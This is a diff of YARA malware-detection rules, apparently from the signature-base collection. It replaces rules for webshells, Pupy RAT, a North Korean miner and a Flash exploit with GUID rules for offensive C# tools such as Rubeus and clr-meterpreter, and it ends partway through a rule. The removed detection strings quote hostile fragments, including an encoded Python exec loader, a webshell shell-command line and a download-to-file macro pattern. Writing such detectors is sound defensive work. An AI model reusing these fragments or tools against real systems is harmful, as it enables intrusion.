-		logic_hash = "28230cd3c1d1da97a98df09243593eb59b57f376f651d5f22c3ea5903f0f73e4"
-		score = 60
+		logic_hash = "4213877aaf5606c9e5f3f38a1f057f8068e0fa062a5f1eb4389d83c6032df6c3"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$typelibguid0lo = "f70d2b71-4aae-4b24-9dae-55bc819c78bb" ascii wide
 
 	condition:
-		uint16( 0 ) != 0x5a4d and uint32( 0x28 ) != 0x00000000 and uint32( 0x28 ) == uint32( 0x2c ) and uint32( uint32( 0x3c ) ^ uint32( 0x28 ) ) ^ uint32( 0x28 ) == 0x00004550
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Crime_Ole_Loadswf_Cve_2018_4878 : PURPORTED_NORTH_KOREAN_ACTORS CVE_2018_4878 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Bypassuac : FILE
 {
 	meta:
-		description = "Detects CVE-2018-4878"
-		author = "Vitali Kremez, Flashpoint"
-		id = "44797bbc-693b-5fcb-a4a4-4ebf3f4da725"
-		date = "2026-01-01"
-		modified = "2023-12-05"
-		reference = "hxxps://www[.]krcert[.]or[.kr/data/secNoticeView.do?bulletin_writing_sequence=26998"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ole_loadswf_cve_2018_4878.yar#L2-L31"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "327f581e-1d8c-5d20-bdd7-a29810c619c9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/cnsimo/BypassUAC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1124-L1138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "716cad0c5a12cc360522e2649c7870a493bef4bec3d55c3a3e235f3a85c02a56"
+		logic_hash = "05dbd4d443664735a10bd48dbbda4edf7ba3756c9dd3f53cb25e066e8f5f1b61"
 		score = 75
 		quality = 85
-		tags = "PURPORTED NORTH KOREAN ACTORS, CVE-2018-4878, FILE"
-		vuln_type = "Remote Code Execution"
-		vuln_impact = "Use-after-free"
-		affected_versions = "Adobe Flash 28.0.0.137 and earlier versions"
-		mitigation0 = "Implement Protected View for Office documents"
-		mitigation1 = "Disable Adobe Flash"
-		weaponization = "Embedded in Microsoft Office first payloads"
-		actor = "Purported North Korean actors"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$header = "rdf:RDF" wide ascii
-		$title = "Adobe Flex" wide ascii
-		$pdb = "F:\\work\\flash\\obfuscation\\loadswf\\src" wide ascii
-		$s0 = "URLRequest" wide ascii
-		$s1 = "URLLoader" wide ascii
-		$s2 = "loadswf" wide ascii
-		$s3 = "myUrlReqest" wide ascii
+		$typelibguid0lo = "4e7c140d-bcc4-4b15-8c11-adb4e54cc39a" ascii wide
+		$typelibguid1lo = "cec553a7-1370-4bbc-9aae-b2f5dbde32b0" ascii wide
 
 	condition:
-		filesize < 500KB and all of ( $header* ) and all of ( $title* ) and 3 of ( $s* ) or all of ( $pdb* ) and all of ( $header* ) and 1 of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_NK_Miner_Malware_Jan18_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hanzoinjection : FILE
 {
 	meta:
-		description = "Detects Noth Korean Monero Miner mentioned in AlienVault report"
-		author = "Florian Roth (Nextron Systems) (original rule by Chris Doman)"
-		id = "40f53c36-9e14-5307-9740-e6f514afc7ec"
-		date = "2018-01-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/PChE1z"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nkminer.yar#L11-L39"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c432bf68-49bf-57c7-bbfa-7bd2f3506c52"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/P0cL4bs/hanzoInjection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1140-L1153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb75fe7d70b547a4774b74c01e11479949dfccb8645af330f87b51daaf0d8dbf"
+		logic_hash = "692e5288fffb8eb65b6f84017c31bb3d5d7320c141cd5a60eef6d9482385bb88"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0024e32c0199ded445c0b968601f21cc92fc0c534d2642f2dd64c1c978ff01f3"
-		hash2 = "42300b6a09f183ae167d7a11d9c6df21d022a5f02df346350d3d875d557d3b76"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x0 = "c:\\users\\jawhar\\documents\\" ascii
-		$x1 = "C:\\Users\\Jawhar\\documents\\" ascii
-		$x2 = "The number of processors on this computer is {0}." fullword wide
-		$x3 = { 00 00 1F 43 00 3A 00 5C 00 4E 00 65 00 77 00 44
-              00 69 00 72 00 65 00 63 00 74 00 6F 00 72 00 79
-              00 00 }
-		$x4 = "Le fichier Hello txt n'existe pas" fullword wide
-		$x5 = "C:\\NewDirectory2\\info2" fullword wide
-		$a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" ascii
-		$b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" ascii
-		$c = "barjuok.ryongnamsan.edu.kp" wide ascii
-		$d = "C:\\SoftwaresInstall\\soft" wide ascii
-		$e = "C:\\Windows\\Sys64\\intelservice.exe" wide ascii
-		$f = "C:\\Windows\\Sys64\\updater.exe" wide ascii
+		$typelibguid0lo = "32e22e25-b033-4d98-a0b3-3d2c3850f06c" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Liudoor : WIN32_DLL
+rule SIGNATURE_BASE_HKTL_NET_GUID_Clr_Meterpreter : FILE
 {
 	meta:
-		description = "Detects Liudoor daemon backdoor"
-		author = "RSA FirstWatch"
-		id = "cf7e08b8-2ccd-5828-917b-11340b4a86b1"
-		date = "2015-07-23"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta_liudoor.yar#L1-L25"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1d8a9717-4d80-5fb1-9c57-9b5f6c5a18b0"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/OJ/clr-meterpreter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1155-L1173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f60002d0173a8ebd2b407e79377d4816e699742aedb1e0649b08fd4ca6cf359"
+		logic_hash = "5d48897457c5f3ea7a9c24a24ab63207c3841bc3ac444d1c42987cb291f05941"
 		score = 75
 		quality = 85
-		tags = "WIN32 DLL"
-		hash0 = "78b56bc3edbee3a425c96738760ee406"
-		hash1 = "5aa0510f6f1b0e48f0303b9a4bfc641e"
-		hash2 = "531d30c8ee27d62e6fbe855299d0e7de"
-		hash3 = "2be2ac65fd97ccc97027184f0310f2f3"
-		hash4 = "6093505c7f7ec25b1934d3657649ef07"
-		type = "Win32 DLL"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string0 = "Succ"
-		$string1 = "Fail"
-		$string2 = "pass"
-		$string3 = "exit"
-		$string4 = "svchostdllserver.dll"
-		$string5 = "L$,PQR"
-		$string6 = "0/0B0H0Q0W0k0"
-		$string7 = "QSUVWh"
-		$string8 = "Ht Hu["
+		$typelibguid0lo = "6840b249-1a0e-433b-be79-a927696ea4b3" ascii wide
+		$typelibguid1lo = "67c09d37-ac18-4f15-8dd6-b5da721c0df6" ascii wide
+		$typelibguid2lo = "e05d0deb-d724-4448-8c4c-53d6a8e670f3" ascii wide
+		$typelibguid3lo = "c3cc72bf-62a2-4034-af66-e66da73e425d" ascii wide
+		$typelibguid4lo = "7ace3762-d8e1-4969-a5a0-dcaf7b18164e" ascii wide
+		$typelibguid5lo = "3296e4a3-94b5-4232-b423-44f4c7421cb3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Pupyrat_PY : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_BYTAGE : FILE
 {
 	meta:
-		description = "Detects Pupy RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cdd689e3-437e-514d-a058-fad80ce0639e"
-		date = "2017-02-17"
-		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_magichound.yar#L10-L29"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4f87ca2c-3ac1-5733-893e-79665b80ffc3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/KNIF/BYTAGE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1175-L1188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b30bc3082be3229ea2ef5d7c51ab6f97df2f612c80c45892e1a13fde1fb56725"
+		logic_hash = "2d295501a64515a68bbd9a3c7f0f5ca0bbf59df5f6c91dd66d2ce6e744ce3fc1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71"
 
 	strings:
-		$x1 = "reflective_inject_dll" fullword ascii
-		$x2 = "ImportError: pupy builtin module not found !" fullword ascii
-		$x3 = "please start pupy from either it's exe stub or it's reflective DLLR;" fullword ascii
-		$x4 = "[INJECT] inject_dll." fullword ascii
-		$x5 = "import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))" fullword ascii
-		$op1 = { 8b 42 0c 8b 78 14 89 5c 24 18 89 7c 24 14 3b fd }
+		$typelibguid0lo = "8e46ba56-e877-4dec-be1e-394cb1b5b9de" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20000KB and 1 of them ) or ( 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Magichound_Malmacro : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Multios_Reverseshell : FILE
 {
 	meta:
-		description = "Detects malicious macro / powershell in Office document"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ad573f52-dbda-5852-ad73-9ef47dd6e7df"
-		date = "2017-02-17"
-		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_magichound.yar#L33-L50"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f54bcb1a-b0cd-5988-bf1d-4fa6c012d6b9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/belane/MultiOS_ReverseShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1190-L1203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "198c6e7ab957d5c1bb45449b0b2210532e97ed11700f8435201200746e0dfa48"
+		logic_hash = "a0b7f881aee1097dcbbd39a832073aada103b23ebc5b167052e9483083fec02d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b"
-		hash2 = "e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6"
 
 	strings:
-		$s1 = "powershell.exe " fullword ascii
-		$s2 = "CommandButton1_Click" fullword ascii
-		$s3 = "URLDownloadToFile" fullword ascii
+		$typelibguid0lo = "df0dd7a1-9f6b-4b0f-801e-e17e73b0801d" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 8000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi_3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hidefromamsi : FILE
 {
 	meta:
-		description = "Web Shell - file h4ntu shell powered by tsoi.php"
-		author = "Florian Roth"
-		id = "2a493748-85eb-561e-98b3-0eed82026510"
-		date = "2014-01-28"
-		modified = "2025-03-21"
-		old_rule_name = "Webshell_h4ntu_shell_powered_by_tsoi_"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L32-L47"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0fa1ce82-b662-5e18-a5da-8359c96cd6e9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/0r13lc0ch4v1/HideFromAMSI"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1205-L1218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "06ed0b2398f8096f1bebf092d0526137"
-		logic_hash = "871e9a057ca3920fcebaec5c2555c2d936d813c0d8bb2a6a69726dee7a796ff8"
-		score = 70
+		logic_hash = "05fccd4c7346c1ac1830984f945f5d37ca3e44a479287d681dfdb06d200764f1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
-		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
-		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
+		$typelibguid0lo = "b91d2d44-794c-49b8-8a75-2fbec3fe3fe3" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnetavbypass_Master : FILE
 {
 	meta:
-		description = "Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt"
-		author = "Florian Roth"
-		id = "0e38b0fc-721a-5591-aeb7-f9dca45b7114"
-		date = "2014-03-29"
-		modified = "2025-03-21"
-		old_rule_name = "Webshell_h4ntu_shell__powered_by_tsoi_"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L48-L63"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4004271b-4fbe-58bb-9613-a077e76324b3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/lockfale/DotNetAVBypass-Master"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1220-L1233"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "06ed0b2398f8096f1bebf092d0526137"
-		logic_hash = "3d9b568a66f3e6933b385fed30921883dd7be17863670c648702ae3403b6e8a1"
-		score = 80
+		logic_hash = "3382613db4970475922fb7db70b6ce4f9c247f083a2164b86ba9e81a770e0e36"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<title>h4ntu shell"
-		$x2 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
+		$typelibguid0lo = "4854c8dc-82b0-4162-86e0-a5bbcbc10240" ascii wide
 
 	condition:
-		filesize < 100KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Sql
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdpapi : FILE
 {
 	meta:
-		description = "Web Shell - file sql.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L65-L79"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1394323f-b336-548f-925c-c276d439e9eb"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/SharpDPAPI"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1235-L1249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2cf20a207695bbc2311a998d1d795c35"
-		logic_hash = "83049c3c5bce88d239b59accb173e234c3169f59187de17b7e6c2a0aa58a552f"
-		score = 70
+		logic_hash = "70f40bc48eeba3f835a280e7e2ce06b2a16179be9914d5c2548c820b02f4c837"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
-		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+		$typelibguid0lo = "5f026c27-f8e6-4052-b231-8451c6a73838" ascii wide
+		$typelibguid1lo = "2f00a05b-263d-4fcc-846b-da82bd684603" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_A
+rule SIGNATURE_BASE_HKTL_NET_GUID_Telegra_Csharp_C2 : FILE
 {
 	meta:
-		description = "Web Shell - file a.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L80-L95"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "495a5f3e-cf05-5a66-b01c-8176ded88768"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/sf197/Telegra_Csharp_C2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1251-L1264"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e3b461f7464d81f5022419d87315a90d"
-		logic_hash = "6bdd5fbe9b16f2d84b884239cf3b6453587933c6b0c4308508d10019b4f36e38"
-		score = 70
+		logic_hash = "ebdec8d1781ffc106f93f3686eb96e6b79810fbb0c7b1eb7cbbb161397298adc"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
-		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
-		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
+		$typelibguid0lo = "1d79fabc-2ba2-4604-a4b6-045027340c85" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Imhapftp_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcompile : FILE
 {
 	meta:
-		description = "Web Shell - file iMHaPFtp.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L96-L110"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c5e053c4-1c90-581a-a6c3-087b252254b2"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/SpiderLabs/SharpCompile"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1266-L1279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "12911b73bc6a5d313b494102abcf5c57"
-		logic_hash = "9099504870c1e466808060f11aea38472832846d24e3c84fdd69b7d26bfed69d"
-		score = 70
+		logic_hash = "a8b46bf3017f336dc669b6c81a339953cc8931df49283b67172f45d1715ef422"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($"
-		$s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
+		$typelibguid0lo = "63f81b73-ff18-4a36-b095-fdcb4776da4c" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jspspyweb
+rule SIGNATURE_BASE_HKTL_NET_GUID_Carbuncle : FILE
 {
 	meta:
-		description = "Web Shell - file Jspspyweb.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L111-L125"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4a87882e-570b-5b40-a8e3-47ebac01d257"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/checkymander/Carbuncle"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1281-L1294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4e9be07e95fff820a9299f3fb4ace059"
-		logic_hash = "491d9c4efee27469f2a26f6fcb7f7c768eac60977e640096ea5f78ff346e7fbe"
-		score = 70
+		logic_hash = "f792c3ed1f62915635dc9090cc608475701d1a4ec60810946336a5d72280af48"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
-		$s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
+		$typelibguid0lo = "3f239b73-88ae-413b-b8c8-c01a35a0d92e" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ossfiletool : FILE
 {
 	meta:
-		description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L126-L140"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fa9aeae1-2aa5-51af-81e2-22a1b6fcda81"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/B1eed/OSSFileTool"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1296-L1309"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "49ad9117c96419c35987aaa7e2230f63"
-		logic_hash = "d3d27d80f5f3adbc050a59d0c25953ec5d634344b5d051a4abdf4eeed3b8b035"
-		score = 70
+		logic_hash = "0dda05d0a53babdf83a2edf9ac0ed21954c059baa73963c79fb840c737865df1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
-		$s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
+		$typelibguid0lo = "207aca5d-dcd6-41fb-8465-58b39efcde8b" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Simattacker_Vrsion_1_0_0_Priv8_4_My_Friend
+rule SIGNATURE_BASE_HKTL_NET_GUID_Rubeus : FILE
 {
 	meta:
-		description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L141-L155"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "54638fe4-84b5-51a8-8c88-9c50ab09ff49"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/Rubeus"
